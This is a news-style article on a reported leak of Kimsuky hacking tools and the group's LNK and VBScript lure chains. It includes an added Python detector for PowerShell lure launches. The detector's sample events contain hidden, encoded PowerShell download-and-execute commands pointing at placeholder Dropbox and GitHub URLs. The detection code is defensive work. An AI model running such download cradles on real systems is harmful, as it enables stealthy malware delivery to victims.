Massive Kimsuky Data Leak Exposes North Korean Cyberespionage and Crypto Theft Arsenal

A stunning breach has pulled back the curtain on one of North Korea’s most feared cyber groups. An alleged member of Kimsuky, a state-sponsored hacking collective, reportedly lost control of a massive trove of data. This leak exposes the detailed methods and tools Kimsuky uses for online spying and stealing cryptocurrency.

This isn’t just a small slip-up. Security researchers at SlowMist say the data dump amounts to hundreds of gigabytes. It includes everything from browsing histories and malware manuals to working programs built to steal cryptocurrency. It’s like finding a blueprint for their entire operation.

According to reports from Cryptopolitan, the leaked information paints a vivid picture. It includes logs from past phishing campaigns and how-to guides for custom backdoors. Tooling such as the “TomCat kernel backdoor,” modified builds of Cobalt Strike, and Ivanti RootRot are all part of the mix, as is Android malware known as Toybox. These details give a rare look at the group’s attack capabilities.

How the Veil Was Lifted

The incident, which reportedly happened in early June 2025, involved two compromised systems, both linked to an operator known by the alias “KIM.” One was a Linux workstation running Deepin 20.9, apparently used to build the malicious software. The other was a public virtual private server (VPS) that hosted spear-phishing material such as fake login pages and command-and-control links.

The hackers responsible, calling themselves “Saber” and “Cyb0rg,” claim they got into both systems. They then pulled out all the content and posted it online for the world to see. While some clues connect “KIM” to Kimsuky’s known online infrastructure, other technical details and language hints suggest a possible link to China. This means the exact origin of the hack against “KIM” is still up in the air.

Meet the Kimsuky Group

Kimsuky has been active since at least 2012. It is widely assessed to be tied to North Korea’s Reconnaissance General Bureau (RGB), the country’s main foreign intelligence agency. Its primary targets are governments, research centers, defense companies, and universities, and its primary mission is intelligence collection, with cryptocurrency theft as a growing sideline.

In 2025, Kimsuky ran operations such as DEEP#DRIVE, which relied on multi-stage attacks. These typically began with a ZIP archive containing a Windows shortcut file (LNK) disguised as an ordinary document. When opened, the shortcut silently ran a PowerShell command that downloaded the next stage from a legitimate service such as Dropbox, while a decoy document was displayed so the victim saw what they expected to see.

In March and April 2025, Kimsuky refined this approach. The malicious ZIP files now carried VBScript and obfuscated PowerShell that assembled their commands at run time rather than storing them in plain text. The payload they dropped could log keystrokes and capture clipboard contents. Most concerning, it could steal private keys from browser-based cryptocurrency wallets in Chrome, Edge, Firefox, and Naver Whale.
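Both of the chains described above (a shortcut in a ZIP that launches hidden PowerShell to fetch a stage from Dropbox, and a VBScript stage that spawns PowerShell to pull from GitHub) leave the same footprint in process-creation telemetry: a script host or explorer.exe as the parent, PowerShell as the child, window-hiding or encoding switches, and a download from a public file-hosting service. The detector below is an added example, not code from the leak or from any of the cited reports. It assumes Sysmon-style process-creation events already parsed into Python dicts with `ParentImage`, `Image` and `CommandLine` fields; the sample events, URLs and file names are constructed for the example, and the hosting-host list is an assumption to be tuned per environment.

```python
import base64
import re
from urllib.parse import urlparse

# Services the article says Kimsuky abused for staging (Dropbox, GitHub).
# Assumed list for this example; extend it for the environment being watched.
CLOUD_STAGING_HOSTS = {
    "dropbox.com", "dl.dropboxusercontent.com",
    "github.com", "raw.githubusercontent.com", "api.github.com",
}
# Parents that mean "a shortcut or script launched this", not an admin console.
SCRIPT_HOST_PARENTS = {"explorer.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}
URL_RE = re.compile(r"https?://[^\s'\"()]+")


def decode_encoded_command(cmdline):
    """Return the script hidden behind -EncodedCommand/-enc/-e (base64 of
    UTF-16LE, which is what PowerShell expects), or None if absent/invalid."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok.lower() in ("-enc", "-encodedcommand", "-e", "-ec"):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except ValueError:  # binascii.Error and UnicodeDecodeError both derive from it
                return None
    return None


def suspicious_flags(cmdline):
    """Collect the launch switches lure chains rely on to stay unseen."""
    toks = cmdline.lower().split()
    found = set()
    for i, t in enumerate(toks):
        nxt = toks[i + 1] if i + 1 < len(toks) else ""
        if t in ("-nop", "-noprofile"):
            found.add("noprofile")
        elif t in ("-enc", "-encodedcommand", "-e", "-ec"):
            found.add("encoded")
        elif t in ("-w", "-windowstyle") and nxt.startswith("hidden"):
            found.add("hidden")
        elif t in ("-ep", "-executionpolicy") and nxt == "bypass":
            found.add("bypass")
    return found


def extract_hosts(text):
    return {urlparse(u).hostname for u in URL_RE.findall(text)} - {None}


def cloud_hosts(hosts):
    return {h for h in hosts if any(h == c or h.endswith("." + c) for c in CLOUD_STAGING_HOSTS)}


def analyze_event(ev):
    """Return a finding dict for a script-host -> PowerShell launch that uses
    evasion switches or pulls from a file-hosting service, else None."""
    image = ev["Image"].rsplit("\\", 1)[-1].lower()
    parent = ev["ParentImage"].rsplit("\\", 1)[-1].lower()
    if image not in POWERSHELL_IMAGES or parent not in SCRIPT_HOST_PARENTS:
        return None
    cmd = ev["CommandLine"]
    decoded = decode_encoded_command(cmd)
    flags = suspicious_flags(cmd)
    # Look for URLs both in the visible command line and inside the decoded blob.
    hosts = extract_hosts(cmd) | (extract_hosts(decoded) if decoded else set())
    staging = cloud_hosts(hosts)
    if not flags and not staging:
        return None
    return {"parent": parent, "flags": sorted(flags), "decoded": decoded,
            "staging_hosts": sorted(staging)}


def scan(events):
    return [f for f in (analyze_event(e) for e in events) if f]


def encode_ps(script):
    """Encode a script the way an attacker would for -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
STAGE_URL = "https://www.dropbox.com/s/example/stage.txt?dl=1"  # constructed placeholder
# Constructed sample telemetry: two lure chains followed by two benign launches.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS_IMAGE,            # LNK lure
     "CommandLine": "powershell.exe -nop -w hidden -enc " + encode_ps(
         "IEX (New-Object Net.WebClient).DownloadString('" + STAGE_URL + "')")},
    {"ParentImage": r"C:\Windows\System32\wscript.exe", "Image": PS_IMAGE,   # VBScript stage
     "CommandLine": "powershell -ep bypass -w hidden -c \"iwr "
                    "https://raw.githubusercontent.com/example/repo/main/x.txt -OutFile $env:TEMP\\x.txt\""},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": PS_IMAGE,       # admin script
     "CommandLine": "powershell.exe -File C:\\scripts\\backup.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS_IMAGE,           # user opened a console
     "CommandLine": "powershell.exe"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

The decoded-command step matters more than the flag check: the first sample shows nothing useful on the raw command line, and the Dropbox URL only appears once the UTF-16LE blob is decoded. Run against real telemetry, the parent filter keeps ordinary `cmd.exe`-launched maintenance scripts out of the results while still catching shortcut and script-host launches.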

A Look at Their Toolkit

The group has steadily refined its tools for covert remote access. It has used customized RDP Wrapper builds and proxy malware to reach victim machines. It has also deployed tools such as “forceCopy,” built to copy browser credential files without triggering security warnings.

Kimsuky also has a habit of misusing legitimate online services. For instance, in June 2025, they ran a spear-phishing campaign against targets in South Korea. They stored their malware and stolen data in private GitHub repositories. Dropbox also served as a temporary holding spot for their ill-gotten gains. This tactic allowed them to hide their harmful activities within normal network traffic.

The leak against “KIM” is a rare and significant blow to Kimsuky. This group typically operates quietly in the shadows. Exposing their tools and methods could hurt their ability to spy and steal in the short term. However, security experts warn that Kimsuky is resourceful. They will likely adapt their methods and keep up their cyber-espionage activities.
